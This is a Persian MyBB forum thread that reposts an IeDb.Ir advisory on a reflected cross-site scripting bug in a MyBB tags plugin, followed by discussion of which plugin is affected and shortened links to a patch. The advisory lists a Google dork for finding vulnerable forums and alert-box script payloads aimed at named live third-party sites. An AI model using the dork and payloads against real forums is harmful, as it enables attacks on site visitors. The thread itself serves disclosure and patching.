مرجع پارسی MyBB

نسخه‌ی کامل: Mybb Tags Plugin Cross-Site Scripting Vulnerability
شما در حال مشاهده‌ی نسخه‌ی متنی این صفحه می‌باشید. مشاهده‌ی نسخه‌ی کامل با قالب بندی مناسب.
با سلام و درود.
روز 13 رو با یک اکسپلویتی که اکثر سایت هایی که از mybb استفاده میکنند,حتی سایت های پشتیبانی,این باگ رو دارند.این فکر کنم قبلا ثبت شده بود.اما این روی تمامی ورژن ها و سایت های بزرگتر هم دیده شد و به ثبت رسید.
امیدوارم هرچه زودتر این باگ پتچ بشه.فایل پتچ شده را در همین تاپیک خواهیم گذاشت.
کد:
###########################

# Mybb Tags Plugin Cross-Site Scripting Vulnerability

###########################

#################################

#
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@            @@@  @@@@@@@
#     @@@    @@@@@@@@@@@    @@@  @@         @@@     @@            @@@  @@@@@@@@  
#     @@@    @@@            @@@    @@       @@@       @@          @@@  @@@  @@@  
#     @@@    @@@            @@@      @@     @@@     @@            @@@  @@@  @@@  
#     @@@    @@@@@@@@@@@    @@@       @     @@@@@@@@@@            @@@  @@@@@@
#     @@@    @@@@@@@@@@@    @@@     @@      @@@     @@            @@@  @@@@@@
#     @@@    @@@            @@@   @@        @@@       @@   @@@    @@@  @@@ @@@
#     @@@    @@@            @@@ @@          @@@     @@     @@@    @@@  @@@  @@@
#     @@@    @@@@@@@@@@@    @@@@@           @@@@@@@@@@     @@@    @@@  @@@   @@@
#

#####################################

#####################################

#         Iranian Exploit DataBase

# Mybb Tags Plugin Cross-Site Scripting Vulnerability

# Version Tag Plugin : 1.*

# Vulnerable: 1.6.* and 1.8.*

# Vendor site : https://mods.mybb.com/view/tag-system

# Dork : "MyBB, © 2002-2016" + inurl:tags.php?tag=

# Author : IeDb.Ir

# Site : Www.IeDb.Ir   -   Www.IeDb.Ir/acc   -   xssed.Ir   -   kkli.ir

# Vulnerability attack information site : http://xssed.Ir/

#####################################

Bug :

http://www.site.com/mybb/tags.php?tag=[Xss]

Dem0 :

http://mybbskin.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forum.woc.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.lawwiki.ir/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.andysheh.com/talar/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://stertixforum.altervista.org/tags.php?tag=mybb"><script>alert(/IeDb.Ir/)</script>
http://bmw-diag.pl/tags.php?tag=ZUSB"><script>alert(/IeDb.Ir/)</script>
http://www.englishlearner.info/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script>
http://www.forumszklarskaporeba.pl/tags.php?tag=T%C5%82usty%3Cinput%20onfocus=alert%281%29%20autofocus%3E

#####################################

#  Archive Exploit = http://iedb.ir/exploits-4982.html

#####################################

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-04-01]

###########################

لینک : http://iedb.ir/exploits-4982.html

خیلی از سایت های ایرانی این مشکل رو داشتن و الانم دارن.اما هنوز کسی به فکر پتچ نبودن.انشالله که پتچ کنند و سعی میکنیم به همه اطلاع رسانی کنیم که پتچ کنند.

نکته : دوتا مشکل امنیتی دیگه هم هست که با اینکه درجه اهمیت low هستش.اما باید پتچ بشه.این دوباگ دیگ هکه مکمل همین اکسپلویت هستش,باید پتچ بشه و این دوتای دیگه روی خیلی از سایت ها جواب داده و خواهد داد.انشالله فرصت کنم اون دوتارو هم خواهم گذاشت.
به خیلی ها گزارش دادم.امیدوارم که یکم کمک کنند و به فکر باشند.

ویرایش شده :
پلاگین سالم و بدون مشکل این پورتال,در لینک زیر قرار داده شد :

http://kkli.ir/kJjCt

باگ های بعدی در این سیستم هم در همون تاپیک پتچ خواهد شد و قرار داده خواهد شد.[تصویر:  13.gif]
موفق باشید

این باگ چند روز پیش پابلیک شد.اما امروز قرار داده شده اینجا.چندتا سایت زود پتچ کردند و ماهم پتچ این باگ رو داخل سایت گذاشتیم.
امیدوارم که شاهد اینطوری باگ ها نباشیم.با اینکه باگ همیشه هست.اما به حداقل برسونیم بهتره.

منبع و توضیحات تکمیلی :  تیم امنیتی Iedb.Ir
این پلاگین ( tagCloud ) برای ۱.۶ بوده و قبلا هم باگ امنیتیش اعلام شده و شما هم بهش اشاره دارید تو متن اصلی اما تو متن معرفی باگ به tag system اشاره شده. یکی نیستن، اصلاح کنید لطفا
تگ کلاد : http://community.mybb.com/thread-55796.html
تگ سیستم: http://mods.mybb.com/view/tag-system
تگ کلاد خیلی وقت هم هست که بروز نشده و نمیشه طبق گفته نویسندش. هرچند که با نسخه های جدید ۱.۶ هم سازگاره انگاری اما کسایی که از این استفاده میکنن باید بگم که بهتره حذفش کنن.
(۱۳۹۵/۱/۲۱، ۰۷:۴۶:۰۱ صبح)firstboy000 نوشته است: [ -> ]این پلاگین ( tagCloud ) برای ۱.۶ بوده و قبلا هم باگ امنیتیش اعلام شده و شما هم بهش اشاره دارید تو متن اصلی اما تو متن معرفی باگ به tag system اشاره شده. یکی نیستن، اصلاح کنید لطفا
تگ کلاد : http://community.mybb.com/thread-55796.html
تگ سیستم: http://mods.mybb.com/view/tag-system
تگ کلاد خیلی وقت هم هست که بروز نشده و نمیشه طبق گفته نویسندش. هرچند که با نسخه های جدید ۱.۶ هم سازگاره انگاری اما کسایی که از این استفاده میکنن باید بگم که بهتره حذفش کنن.

به به.سلام داداش گلم.دلم واست تنگ شده بود.خوشحالم که دیدمت.
داداش تا یک جایی حرفت درسته
اما من از این لینک برداشتم :
Vendor site : http://kkli.ir/mW3Ii

نکته : توسط سایت کوتاه کننده لینک kkli.ir کوتاه کردم.

همچنین بر روی همین روی سایت خودم و روی لوکال تست کردم.گزارش ها برای mybb 1.4  بود.
اما روی 1.6.18 تست کردم.روی 1.8.5 و .1.8.6 هم تست شد و جواب داد.الان اگه دموهارو ببینی میبینی که دوتاش 1.8 هستش
چون بهشون اعلام کردم.

در مورد اینکه بهتره که پاک شه,این میشه پاک کردن صورت مسئله.
اینم پتچ کامل :

پلاگین تگ ساز و کلمات کلیدی که باگ پتچ شده است

البته اینم بگم,دوتا دیگه باگ داره که دارم اول پتچ رو درست میکنم.بعد پابلیک میکنم.
با اجازه برای اینکه تبلیغ نشه,با سایت kkli.ir سایت اصلی رو کوتاه میکنم :
http://kkli.ir/qSOV4
شما دمو هارو ببینید.هنوز یک عالمه بود.اما میبینید که کسانی که به حساب مرجع میگن,اینو دارند.اما پتچ نکرده اند و اصلا چک نکرده اند
که خودم زودتر بهشون خبر دادم و خدارو شکر دوستان و تمام تیم ها همکاری کردند.
وظیفم بود که اطلا رسانی کنم واسه دوستان.از شمام تشکر